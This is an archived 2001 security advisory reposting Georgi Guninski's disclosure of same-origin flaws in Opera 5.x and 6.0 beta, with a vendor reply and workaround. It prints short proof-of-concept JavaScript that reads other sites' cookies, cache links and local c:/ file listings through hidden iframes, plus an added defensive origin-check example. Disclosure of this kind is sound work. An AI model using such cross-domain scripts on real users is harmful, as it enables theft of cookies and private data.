16th Nov 2001 [SBWID-4860]
COMMAND
Opera web browser multiple java vulnerabilities
SYSTEMS AFFECTED
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions
PROBLEM
In Georgi Guninski's security advisory #51 [www.guninski.com]:
Several javascript vulnerabilities in Opera
Systems affected: Opera 5.12/Windows, Opera 5.0/Linux - probably other
versions
Risk: Medium
Date: 15 November 2001
Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You
may distribute it unmodified. You may not modify it and distribute it
or distribute parts of it without the author's written permission.
Disclaimer: The information in this advisory is believed to be true
based on experiments though it may be false. The opinions expressed in
this advisory and program are my own and not of any company. The usual
standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.
Announcement: I am looking for contracts in the security area - check
http://www.guninski.com
Description: Opera is a multiplatform web browser. There are several
javascript vulnerabilities in it, basically allowing script in a page
to access a page and its properties in another domain - AFAIK Netscape
call this "Same Origin Vulnerability". It is possible for a script in a
web page to access at least cookies and links in arbitrary domains to
which the user has access. It is also possible for a script to read the
links in the user's cache and history, which at least has privacy
implications if not more. In some cases cookies and links in the
cache/history may contain sensitive information such as
usernames/passwords etc.
Details:
Examine the following scripts:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------
-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------
In addition, the HotJava exploit at
http://www.guninski.com/hotjava1-desc.html works, as Jay@InfoAve.net
pointed out.
Andreas Sandblad [http://www.homer.nu/security/opera/] added:
One thing that wasn't mentioned and might not be obvious is that the
vulnerability can also be used to list files on the user's hard drive.
This is because the URL file://c:/ is seen as an HTML page by Opera.
Thus we can use document.links to retrieve filenames and directories.
Opera released 6.0 beta 1 for Windows three days ago and it's also
vulnerable. In fact it's actually much easier to write the script for
it and easier to make the attack invisible since Opera added better
support for iframe.
Opera 6.0 (not 5.x): List files and directories in c:/
<iframe id="rewrite" src="file://c:/" width=0 height=0></iframe>
<script language="javascript">
s="javascript:t=\'\';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);";
setTimeout('parent.rewrite.document.location="'+s+'"',1);
</script>
Opera 6.0 (not 5.x): Get google cookie
<iframe id="rewrite" src="http://www.google.com/" width=0 height=0></iframe>
<script language="javascript">
setTimeout('parent.rewrite.document.location="javascript:alert(document.cookie)"',8000);
</script>
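The check that the advisory says Opera failed to apply, written out as an added example (not Opera's code and not part of the advisory): a browser must compare the (scheme, host, port) origin of the calling page with that of the target document before exposing document.cookie or document.links, and file: and about: documents must never compare equal to a web page. The attacker.example host and the function names are assumptions for illustration.

```javascript
// Added example (not Opera's code): the origin comparison a browser must
// make before letting script in one window read another window's
// document.cookie, document.links, etc. An origin is the (scheme, host,
// port) triple; file: and about: documents get no web-shareable origin.
function originOf(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null; // unparsable: treat as an opaque origin
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") {
    return null; // file:, about:, javascript: ... are opaque here
  }
  const port = u.port || (u.protocol === "http:" ? "80" : "443");
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Script running in `callerUrl` may touch the document at `targetUrl`
// only when both have a real origin and the origins are identical.
function isSameOrigin(callerUrl, targetUrl) {
  const a = originOf(callerUrl);
  const b = originOf(targetUrl);
  return a !== null && b !== null && a === b;
}

// Constructed cases: a page on a hypothetical attacker.example host
// against the targets the advisory's scripts open or frame, plus one
// legitimate same-origin pair. A correct browser answers false, false,
// false, false, true; the advisory shows Opera granting access in the
// first four cases.
const CASES = [
  ["http://attacker.example/page.html", "http://mail.yahoo.com"],
  ["http://attacker.example/page.html", "about:cache"],
  ["http://attacker.example/page.html", "file://c:/"],
  ["http://attacker.example/page.html", "http://www.google.com/"],
  ["http://www.google.com/a", "http://www.google.com:80/b"],
];

function checkCases() {
  return CASES.map(([caller, target]) => isSameOrigin(caller, target));
}

console.log(checkCases()); // → [ false, false, false, false, true ]
```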
SOLUTION
Workaround: Disable javascript (Opera suggests enabling "Use cookies to
trace password protected documents")
Vendor status: The vendor was notified on 5 November 2001 and was asked
whether a fix shall be issued and when. The reply was:
------------------------------------
You should be able to resolve the
cookie issue by enabling "Use cookies to trace password protected
documents", which means that pages with password protection aren't
cached, cookies aren't stored, the URL shouldn't be displayed in
History, etc. This is a "paranoia" option, and makes a few pages
unusable. As you are probably aware, many web technologies aren't very
secure, but it is inconvenient for the user to block these. This is why
the user should be given a choice to block privacy related information.
------------------------------------